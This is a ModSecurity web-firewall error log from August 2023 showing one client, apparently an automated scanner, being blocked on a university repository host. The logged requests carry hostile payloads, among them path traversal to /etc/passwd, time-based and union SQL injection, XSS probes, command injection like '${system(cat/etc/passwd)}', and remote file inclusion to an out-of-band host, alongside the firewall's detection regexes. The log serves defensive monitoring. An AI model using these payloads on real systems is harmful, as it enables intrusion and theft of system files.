[Tue Aug 29 11:40:39.432086 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAYf-HwAAAAD"]
[Tue Aug 29 11:40:40.360261 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAcVJPwAAAAB"]
[Tue Aug 29 11:40:44.559805 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAaHMfwAAAAE"]
[Tue Aug 29 11:40:44.646765 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAaZ9joAAAAo"]
[Tue Aug 29 11:40:46.439389 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAaHMgUAAAAE"]
[Tue Aug 29 11:40:50.382912 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcjAkkAAAAw"]
[Tue Aug 29 11:40:50.426234 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAcoNNcAAAAF"]
[Tue Aug 29 11:40:53.780768 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEwAAAAH"]
[Tue Aug 29 11:40:55.460502 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcYU6AAAAAp"]
[Tue Aug 29 11:40:58.389180 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcbSBEAAAAv"]
[Tue Aug 29 11:40:58.460570 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAYf-LMAAAAD"]
[Tue Aug 29 11:40:58.461590 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcvBcQAAAAJ"]
[Tue Aug 29 11:40:59.395292 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gro9ix8qchuwf6.oast.site found within TX:1: cjmnbitjmimt14dgn26gro9ix8qchuwf6.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcvBccAAAAJ"]
[Tue Aug 29 11:40:59.431567 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAYf-LgAAAAD"]
[Tue Aug 29 11:41:00.360293 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcsLCoAAAAE"]
[Tue Aug 29 11:41:00.381321 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAaZ9lcAAAAo"]
[Tue Aug 29 11:41:00.420017 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAcYU7cAAAAp"]
[Tue Aug 29 11:41:01.544245 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAAcbSCAAAAAv"]
[Tue Aug 29 11:41:01.570501 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAcvBdIAAAAJ"]
[Tue Aug 29 11:41:01.571178 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAActbF4AAAAH"]
[Tue Aug 29 11:41:03.583179 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAcYU8kAAAAp"]
[Tue Aug 29 11:41:03.644557 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAYMWUcAAAAR"]
[Tue Aug 29 11:41:04.400777 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124MCo-f0AAAcoNOwAAAAF"]
[Tue Aug 29 11:41:05.427689 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO124cCo-f0AAAcsLEoAAAAE"]
[Tue Aug 29 11:41:05.463253 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcuUnMAAAAI"]
[Tue Aug 29 11:41:05.495267 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124cCo-f0AAAYMWVUAAAAR"]
[Tue Aug 29 11:41:05.531887 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repository.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcoNPkAAAAF"]
[Tue Aug 29 11:41:05.551913 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAcuUnYAAAAI"]
[Tue Aug 29 11:41:08.409373 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAcYU-QAAAAp"]
